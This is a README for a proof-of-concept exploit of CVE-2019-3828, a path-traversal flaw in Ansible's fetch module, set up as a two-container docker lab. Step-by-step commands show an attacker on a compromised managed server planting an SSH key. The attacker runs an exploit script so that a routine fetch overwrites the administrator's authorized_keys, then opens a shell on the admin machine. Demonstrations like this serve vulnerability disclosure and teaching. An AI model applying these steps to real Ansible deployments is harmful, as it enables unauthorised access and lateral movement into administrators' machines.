This directory contains a proof-of-concept exploit for CVE-2019-3828, a path-traversal vulnerability in Ansible's fetch module. The scenario for the demo is that there are two computers, named "server" and "zeuss". The former is a member of a server farm managed using Ansible. The latter machine belongs to a systems adminstrator who is responsible for managing the server farm. The system administrator's username is "bofh". Now imagine that an attacker has managed to infiltrate one of the server machines and is able to run arbitrary commands as the "bofh" user. But the attacker does not know bofh's password, so is not able to access other user accounts, or other computers, such as zeuss.
Ansible's fetch module is used to copy files from the servers back to the system adminstrator's computer. In this demo, the system administrator is going to download .ssh/authorized_keys from the server to check that it hasn't been tampered with. But the attacker is going to exploit a path traversal vulnerability in the fetch module and overwrite the system administrator's own .ssh/authorized_keys.
The demo uses docker to simulate the two computers. See below for instructions.
Create a docker network bridge, to simulate a network with two separate computers.
docker network create -d bridge --subnet 172.16.0.0/16 ansible-demo-network
Build the docker image:
docker build ./server -t ansible-server
Start the container:
docker run --rm --network ansible-demo-network --ip=172.16.0.10 -h server -i -t ansible-server
Inside the container, start sshd to enable remote access from zeuss.
tmux # this step is optional: it enables you to open multiple terminals inside docker
sudo service ssh start # sudo password is "x" (this is the only time that sudo is used)
In a new terminal, build the docker image for zeuss.
docker build ./zeuss -t ansible-zeuss
Start the container:
docker run --rm --network ansible-demo-network --ip=172.16.0.11 -h zeuss -i -t ansible-zeuss
Inside the container:
source ./ansible/hacking/env-setup # Add Ansible to the path
tmux # this step is optional: it enables you to open multiple terminals inside docker
sudo service ssh start # sudo password is "x"
First, let us see how the fetch module is supposed to work. On zeuss, run the following commands:
cd /home/bofh/config
ansible-playbook myfetch.yml
This copies authorized_keys from the server to the following locatino on zeuss:
/home/bofh/config/fetched/172.16.0.10/home/bofh/.ssh/authorized_keys
Note that the file has been placed safely in a subdirectory of the current directory.
Now let's enable the exploit on the server. Run the following commands on the server:
ssh-keygen -t ed25519 -f /home/bofh/.ssh/id_ed25519 # Create a new ssh key
cat /home/bofh/.ssh/id_ed25519.pub >> /home/bofh/.ssh/authorized_keys # Add new key to authorized_keys
cd /home/bofh/scripts
./enable_exploit.sh
Now go back to zeuss and run the same fetch playbook as before:
cd /home/bofh/config
ansible-playbook myfetch.yml
The authorized_keys file has now been overwritten. Which means that the attacker can ssh into zeuss. Run this command on the server:
ssh 172.16.0.11
The attacker has a shell on zeuss!